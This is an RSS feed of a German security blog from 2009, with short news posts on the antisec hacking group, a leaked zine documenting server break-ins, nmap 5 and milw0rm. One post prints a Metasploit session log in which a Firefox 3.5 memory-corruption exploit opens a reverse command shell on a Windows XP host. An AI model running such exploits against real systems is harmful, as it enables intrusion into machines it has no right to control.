<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>shiftzwei &#187; security</title>
	<atom:link href="http://www.shiftzwei.de/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.shiftzwei.de</link>
	<description></description>
	<lastBuildDate>Wed, 13 Oct 2010 10:32:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>gute hacker / schlechte hacker</title>
		<link>http://www.shiftzwei.de/security/gute-hacker-schlechte-hacker/</link>
		<comments>http://www.shiftzwei.de/security/gute-hacker-schlechte-hacker/#comments</comments>
		<pubDate>Thu, 30 Jul 2009 19:47:36 +0000</pubDate>
		<dc:creator>cz</dc:creator>
				<category><![CDATA[fundsachen]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[exploits]]></category>

		<guid isPermaLink="false">http://www.shiftzwei.de/security/gute-hacker-schlechte-hacker/</guid>
		<description><![CDATA[Nachdem in der letzten Zeit mehrere Server von IT-Security Seiten von der antisec Gruppe (hinter der angeblich der Hacker RoMeO steckt) gehackt wurden, gehen die Angriffe jetzt wohl weiter. Im Vorfeld der IT-Security Konferenz Blackhat veröffentlichen unbekannte Hacker nun die Dokumentation zahlreicher Server-Einbrüche im Zero for Owned Magazin. Opfer sind unter anderem Dan Kaminsky und [...]]]></description>
			<content:encoded><![CDATA[<p></p>
<p>Nachdem in der letzten Zeit mehrere Server von IT-Security Seiten von der <a href="http://www.shiftzwei.de/security/antisec/">antisec Gruppe</a> (hinter der angeblich der Hacker RoMeO steckt) gehackt wurden, gehen die Angriffe jetzt wohl weiter. Im Vorfeld der IT-Security Konferenz <a href="http://www.blackhat.com/">Blackhat</a> veröffentlichen unbekannte Hacker nun die Dokumentation zahlreicher Server-Einbrüche im Zero for Owned Magazin. Opfer sind unter anderem Dan Kaminsky und Kevin Mitnick.</p>
<p>Den ganzen Bericht, kann man hier <a href="http://www.shiftzwei.de/dl/zf05.txt">herunterladen</a>. Genau wie in den Einbruchs-Dokumentation der antisec Gruppe, gibt es wieder allerlei sarkastische Kommentare und gute Unterhaltung. Und natürlich schüren die verschiedenen Einbrüche wieder die <a href="http://www.shiftzwei.de/fundsachen/geruchtekuche/">Gerüchte eines ssh Exploits</a>.</p>
<p>Weitere Informationen und erste Kommentare der Betroffenen gibt es bei <a href="http://www.heise.de/security/Cracker-nehmen-Hacker-Promis-ins-Visier--/news/meldung/142844">Heise</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.shiftzwei.de/security/gute-hacker-schlechte-hacker/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>nmap 5 / portscanning</title>
		<link>http://www.shiftzwei.de/security/nmap-5-portscanning/</link>
		<comments>http://www.shiftzwei.de/security/nmap-5-portscanning/#comments</comments>
		<pubDate>Fri, 17 Jul 2009 06:57:05 +0000</pubDate>
		<dc:creator>cz</dc:creator>
				<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.shiftzwei.de/?p=131</guid>
		<description><![CDATA[nmap 5 ist raus. Hier gibt es die wichtigsten Änderungen: nmap 5 changes]]></description>
			<content:encoded><![CDATA[<p></p>
<p>nmap 5 ist raus. Hier gibt es die wichtigsten Änderungen:</p>
<p><a href="http://nmap.org/5/#5changes">nmap 5 changes</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.shiftzwei.de/security/nmap-5-portscanning/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>antisec</title>
		<link>http://www.shiftzwei.de/security/antisec/</link>
		<comments>http://www.shiftzwei.de/security/antisec/#comments</comments>
		<pubDate>Wed, 15 Jul 2009 12:57:03 +0000</pubDate>
		<dc:creator>cz</dc:creator>
				<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.shiftzwei.de/?p=117</guid>
		<description><![CDATA[Die antisec Gruppe, welche für die Hacks der Server von astalavista.com, infosec.org.uk, ssanz.net, sowie den imageshack Hack vom Wochenende verantwortlich ist, kündigt auf der full-disclosure Mailing Liste an, die Server von hackforums.net und milw0rm.com zu hacken. Allerdings schein gerade ein denial of service Angriff gegen den Server von hackforums.net statt zufinden und so bittet die [...]]]></description>
			<content:encoded><![CDATA[<p></p>
<p>
Die antisec Gruppe, welche für die Hacks der Server von <a href="http://www.shiftzwei.de/?p=87">astalavista.com, infosec.org.uk, ssanz.net</a>, sowie den <a href="http://seclists.org/fulldisclosure/2009/Jul/0095.html">imageshack Hack vom Wochenende</a> verantwortlich ist, kündigt auf der full-disclosure Mailing Liste an, <a href="http://seclists.org/fulldisclosure/2009/Jul/0164.html"> die Server von hackforums.net und milw0rm.com zu hacken</a>.</p>
<p>Allerdings schein gerade ein denial of service Angriff gegen den Server von hackforums.net statt zufinden und so bittet die anti-sec Gruppe, den unbekannten Urheber des Angriffes doch den Angriff einzustellen, damit man endlich den Server hacken kann. (LOL)</p>
<p>Die Gruppe verfügt angeblich über einen apache 0day exploit, welche alle apache Versionen betreffen soll. Was soll man davon halten. Man wird sehen.</p>
<p><img src="http://www.shiftzwei.de/wp-content/uploads/hG5aT.jpg" width="619" height="805" alt="hG5aT.jpg" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.shiftzwei.de/security/antisec/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>firefox 3.5 / 0day exploit</title>
		<link>http://www.shiftzwei.de/security/firefox-3-5-0day-exploit/</link>
		<comments>http://www.shiftzwei.de/security/firefox-3-5-0day-exploit/#comments</comments>
		<pubDate>Wed, 15 Jul 2009 11:08:37 +0000</pubDate>
		<dc:creator>cz</dc:creator>
				<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.shiftzwei.de/?p=103</guid>
		<description><![CDATA[Gestern wurde bei milw0rm ein 0day Exploit für die aktuelle Version von Firefox 3.5 veröffentlicht. msf exploit(firefox_escape_retval) &#62; exploit [*] Exploit running as background job. msf exploit(firefox_escape_retval) &#62; [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://192.168.1.102:80/test2 [*] Server started. [*] Sending Firefox 3.5 escape() Return Value Memory Corruption to [...]]]></description>
			<content:encoded><![CDATA[<p></p>
<p>Gestern wurde bei <a href="http://www.milw0rm.com">milw0rm</a> ein 0day Exploit für die aktuelle Version von Firefox 3.5 veröffentlicht.</p>
<p>
<code>msf exploit(firefox_escape_retval) &gt; exploit<br />
[*] Exploit running as background job.<br />
msf exploit(firefox_escape_retval) &gt;<br />
[*] Handler binding to LHOST 0.0.0.0<br />
[*] Started reverse handler<br />
[*] Using URL: http://192.168.1.102:80/test2<br />
[*] Server started.<br />
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.101:2950...<br />
[*] Sending stage (474 bytes)<br />
[*] Command shell session 1 opened (192.168.1.102:4444 -&gt; 192.168.1.101:2951)<br />
msf exploit(firefox_escape_retval) &gt; sessions -i 1<br />
[*] Starting interaction with 1...<br />
Microsoft Windows XP [Version 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.<br />
C:ProgrammeMozilla Firefox&gt;</code></p>
]]></content:encoded>
			<wfw:commentRss>http://www.shiftzwei.de/security/firefox-3-5-0day-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>milw0rm wieder da? [update]</title>
		<link>http://www.shiftzwei.de/security/milw0rm-wieder-da/</link>
		<comments>http://www.shiftzwei.de/security/milw0rm-wieder-da/#comments</comments>
		<pubDate>Fri, 10 Jul 2009 06:39:22 +0000</pubDate>
		<dc:creator>cz</dc:creator>
				<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.shiftzwei.de/?p=91</guid>
		<description><![CDATA[nachdem Heise und andere milw0rm für tot erklärt haben macht die Seite heute einen recht lebhaften Eindruck. Tot gesagte leben länger! [und doch wieder down] [und wieder zu erreichen ... was bloß da los?]]]></description>
			<content:encoded><![CDATA[<p></p>
<p>nachdem <a href="http://www.heise.de/security/Exploit-Portal-Milw0rm-stellt-Arbeit-ein-Update--/news/meldung/141727">Heise</a> und andere <a href="http://www.milw0rm.com/">milw0rm</a> für tot erklärt haben macht die Seite heute einen recht lebhaften Eindruck. Tot gesagte leben länger!</p>
<p>
[und doch wieder down]<br />
<br />
[und wieder zu erreichen ... was bloß da los?]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.shiftzwei.de/security/milw0rm-wieder-da/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

